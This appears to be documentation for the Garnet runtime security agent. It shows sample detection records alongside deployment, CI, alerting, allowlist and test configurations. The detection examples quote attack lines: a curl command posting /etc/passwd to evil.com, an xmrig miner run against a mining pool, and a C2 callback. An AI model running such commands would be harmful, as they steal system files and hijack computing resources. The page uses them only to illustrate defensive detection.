Examples

Real detections from production environments.

Crypto Miner Blocked

{
  "id": "det_Xy8K2p",
  "type": "crypto_miner",
  "severity": "critical",
  "timestamp": "2025-09-29T10:23:45Z",
  "verdict": "blocked",
  "process": {
    "name": "xmrig",
    "pid": 12849,
    "cmdline": "./xmrig -o pool.minexmr.com:4444",
    "user": "www-data",
    "ancestry": ["npm install", "bash", "github-actions"]
  },
  "network": {
    "destination": "pool.minexmr.com",
    "ip": "51.79.175.139",
    "port": 4444
  },
  "action": "process_killed"
}
What happened: Malicious npm package spawned crypto miner during npm install
Action taken: Process killed immediately, alert sent to Slack

Data Exfiltration Attempt

{
  "id": "det_Br3Nm9",
  "type": "data_exfiltration",
  "severity": "high",
  "timestamp": "2025-09-29T14:56:12Z",
  "verdict": "blocked",
  "process": {
    "name": "curl",
    "cmdline": "curl -X POST -d @/etc/passwd https://evil.com"
  },
  "network": {
    "destination": "evil.com",
    "ip": "198.51.100.42",
    "port": 443,
    "bytes_sent": 524288000
  },
  "action": "connection_blocked"
}
What happened: Compromised script attempted to exfiltrate /etc/passwd
Action taken: Network connection blocked, file read logged

Supply Chain Attack

{
  "id": "det_Aq5Tv2",
  "type": "c2_callback",
  "severity": "critical",
  "timestamp": "2025-09-29T09:15:33Z",
  "verdict": "blocked",
  "process": {
    "name": "node",
    "cmdline": "node setup.js",
    "ancestry": ["npm install", "bash", "github-actions"]
  },
  "network": {
    "destination": "badactor.cn",
    "ip": "203.0.113.89",
    "port": 8080
  },
  "action": "connection_blocked"
}
What happened: Compromised dependency tried to call home to C2 server during CI build
Action taken: Connection blocked, build continued safely

Production Setups

Multi-cluster monitoring

# cluster-1: production-us-east
helm install jibril garnet/jibril \
  --set apiToken=$GARNET_API_TOKEN \
  --set cluster.name=production-us-east \
  --namespace garnet-system

# cluster-2: production-eu-west
helm install jibril garnet/jibril \
  --set apiToken=$GARNET_API_TOKEN \
  --set cluster.name=production-eu-west \
  --namespace garnet-system
Result: All clusters visible in dashboard with labels

CI/CD with blocking

name: Secure Build

on: push

jobs:
  build:
    runs-on: ubuntu-latest
    
    steps:
      - uses: actions/checkout@v4
      
      - uses: garnetlabs/garnet-action@v1
        with:
          mode: block              # Kill threats
          fail-on-detection: true  # Fail build if threat found
        env:
          GARNET_API_TOKEN: ${{ secrets.GARNET_API_TOKEN }}
      
      - run: npm install  # Protected
      - run: npm run build
      - run: npm test
Result: Build fails automatically if crypto miner or malicious package detected

Slack + PagerDuty alerts

# Dashboard → Settings → Notifications

# Slack
Webhook URL: https://hooks.slack.com/services/YOUR/WEBHOOK/URL

# PagerDuty (via generic webhook)
Webhook URL: https://events.pagerduty.com/v2/enqueue
Headers: Authorization: Token token=YOUR_PD_TOKEN
Slack notification example: 
🚨 Critical Alert: Crypto Miner Blocked
Agent: prod-cluster-3-node-7a2f
Process: xmrig
Action: Killed
View: https://dashboard.garnet.ai/detections/det_Xy8K2p

Custom allowlist

# dashboard.garnet.ai/settings/allowlist

allowlist:
  ips:
    - 192.168.1.0/24  # Internal network
    - 10.0.0.0/8      # VPC
  
  domains:
    - "*.github.com"
    - "registry.npmjs.org"
    - "api.stripe.com"
  
  processes:
    - name: "curl"
      cmdline_pattern: "curl.*internal\\.company\\.com"
    
    - name: "wget"
      user: "deployer"

Test suite

#!/bin/bash
# test-garnet.sh - Verify Garnet is working

set -e

echo "Testing Garnet detections..."

# Test 1: Malicious domain
curl -s http://malicious.test.garnet.ai
echo "✅ Test connection sent"

# Test 2: Suspicious DNS
nslookup "longbase64string.evil.test.garnet.ai" || true

# Test 3: Check detection appeared
sleep 10
DETECTIONS=$(curl -s -H "Authorization: Bearer $GARNET_API_TOKEN" \
  https://api.garnet.ai/v1/detections?limit=5)

if echo "$DETECTIONS" | grep -q "malicious.test.garnet.ai"; then
  echo "✅ All tests passed - Garnet is working!"
else
  echo "❌ No detection found - check agent status"
  exit 1
fi

Integration Examples

Terraform

resource "kubernetes_daemon_set" "jibril" {
  metadata {
    name      = "jibril"
    namespace = "garnet-system"
  }

  spec {
    selector {
      match_labels = {
        app = "jibril"
      }
    }

    template {
      metadata {
        labels = {
          app = "jibril"
        }
      }

      spec {
        host_pid     = true
        host_network = true

        container {
          name  = "jibril"
          image = "ghcr.io/garnetlabs/jibril:latest"

          security_context {
            privileged = true
          }

          env {
            name = "GARNET_API_TOKEN"
            value_from {
              secret_key_ref {
                name = "garnet-token"
                key  = "token"
              }
            }
          }
        }
      }
    }
  }
}

Helm values

# values.yaml
apiToken: "garnet_xxx"
mode: "block"

resources:
  limits:
    cpu: 200m
    memory: 128Mi
  requests:
    cpu: 50m
    memory: 64Mi

cluster:
  name: "production"
  
blocking:
  enabled: true
  
notifications:
  slack:
    enabled: true
    webhook: "https://hooks.slack.com/services/xxx"

# Install
helm install jibril garnet/jibril -f values.yaml -n garnet-system
Need more examples? Ask in Discord